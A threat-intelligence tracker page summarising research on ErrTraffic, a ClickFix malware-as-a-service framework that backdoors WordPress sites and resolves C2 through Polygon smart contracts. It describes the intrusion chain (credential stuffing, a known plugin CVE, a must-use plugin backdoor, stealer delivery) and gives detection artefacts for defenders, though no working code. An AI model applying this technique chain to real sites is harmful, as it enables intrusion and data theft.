ctipilot.ch

ErrTraffic

campaign · campaign:sekoia-errtraffic-clickfix-maas-polygon-c2 single-source

ErrTraffic — ClickFix MaaS distribution framework with EtherHiding/Polygon C2 resolution; EU WordPress targeting

Coverage timeline
3
first 2026-06-17 → last 2026-06-22
Entries
3
2 distinct days
Sources cited
4
4 hosts
Sections touched
3
research, weekly-long-running, weekly-research
Co-occurring entities
1
see Related entities below
2026-06-173 appearances2026-06-22

Story timeline

  1. 2026-06-22SocGholish / TA569 — Operation Endgame seized 106 servers, but seven delivery clusters remain operational
    weekly-long-runningSocGholish / TA569 — Operation Endgame seized 106 servers, but seven delivery clusters remain operational
  2. 2026-06-22Research: ClickFix matured into a productised malware-as-a-service supply chain
    weekly-researchResearch: ClickFix matured into a productised malware-as-a-service supply chain
  3. 2026-06-17Sekoia: ErrTraffic — a ClickFix Malware-as-a-Service framework resolving C2 through the Polygon blockchain
    researchSekoia: ErrTraffic — a ClickFix Malware-as-a-Service framework resolving C2 through the Polygon blockchain

Where this entity is cited

  • research1
  • weekly-research1
  • weekly-long-running1

Source distribution

  • blog.sekoia.io1 (25%)
  • huntress.com1 (25%)
  • malwarebytes.com1 (25%)
  • proofpoint.com1 (25%)

Related entities

Entries about ErrTraffic (3)

2026-06-22 · view entry permalink →

SocGholish / TA569 — Operation Endgame seized 106 servers, but seven delivery clusters remain operational

notable synthesis discovered 2026-06-22 00:15 UTC single-source

key: item:operation-endgame-expands-to-socgholish-ta569-106-c2-servers. The Operation Endgame takedown (§ 5) was the headline; Proofpoint's post-action analysis is the status update that matters for the longer arc. TA569 served for years as a primary distribution layer for WastedLocker (Evil Corp), LockBit and RansomHub, and while law enforcement seized over 100 servers and 14,971 WordPress sites were remediated, seven FakeUpdates-style clusters remain operational — TA2726, TA2727, ZPHP, ErrTraffic (the ClickFix MaaS in § 6), LandUpdate808/KongTuke, GeoTDS and tdsshop (Proofpoint, 2026-06-18; daily 06-19). Proofpoint also notes WordPress sites frequently reinfect because the underlying credential compromise outlives CMS-level cleanup. The defender consequence: the fake-update initial-access vector is degraded, not closed — keep GPO restrictions on JScript/WSH execution from user-writable paths, browser isolation for email links, and (for WordPress operators) full credential rotation plus FIM after any cleanup, because removing the loader without rotating credentials invites reinfection.

organized-crime law-enforcement supply-chain europe global

2026-06-22 · view entry permalink →

Research: ClickFix matured into a productised malware-as-a-service supply chain

notable research discovered 2026-06-22 00:14 UTC

A second cross-day research thread: the ClickFix technique — fake browser/update dialogues that trick users into pasting attacker PowerShell — has industrialised. Sekoia documented ErrTraffic, a ClickFix Malware-as-a-Service framework that resolves its C2 through the Polygon blockchain (Sekoia, 2026-06-17; daily 06-17), and Huntress detailed the Potemkin loader delivering RMMProject RAT through a ClickFix chain that also bypasses Chromium App-Bound Encryption (Huntress, 2026-06-17; daily 06-17). ErrTraffic also surfaced as one of the SocGholish-adjacent clusters still operating after the Operation Endgame takedown (§ 8). The pattern for defenders: ClickFix is now a delivery channel with multiple competing operators and resilient C2, so user-paste-to-PowerShell detection (clipboard-sourced powershell.exe/mshta.exe invocations, RunMRU artefacts) is worth promoting from awareness training to a standing hunt.

phishing infostealer organized-crime global

2026-06-17 · view entry permalink →

Sekoia: ErrTraffic — a ClickFix Malware-as-a-Service framework resolving C2 through the Polygon blockchain

notable research discovered 2026-06-17 05:14 UTC

ClickFix — fake browser/update dialogues that trick users into pasting attacker PowerShell — is maturing into a productised delivery channel, as this and the next item show. Sekoia's TDR team analysed ErrTraffic, a ClickFix distribution framework sold as MaaS by an actor using the handle "LenAI" on the Exploit.IN forum since at least December 2025 (Sekoia TDR, 2026-06-16). Affiliates compromise WordPress sites by credential-stuffing wp-login.php (one victim saw seven residential IPs in an 80-second window) or via WP File Manager CVE-2020-25213, then deploy a PHP backdoor as a must-use plugin (session-manager.php) that injects the ErrTraffic JavaScript. The JavaScript uses the EtherHiding technique — querying Polygon smart contracts via public RPC endpoints — to resolve C2 domains dynamically, defeating takedowns; it then serves ClickFix lures that drop Vidar, Stealc, SmokeLoader and others. ErrTraffic explicitly targets European and APAC visitors, putting public-sector WordPress portals in scope.

Why it matters to us: A reliable hunt artefact is the distinctive PowerShell comment block <# Code Verification: NNNNNNNNNNNN #> Sekoia found at the start of ErrTraffic command strings. Also watch for new PHP files under wp-content/mu-plugins/ (auto-loaded, no activation needed), credential-stuffing bursts on wp-login.php, and outbound requests from the web-server process to blockchain RPC endpoints.

supply-chain infostealer phishing cryptocrime europe apac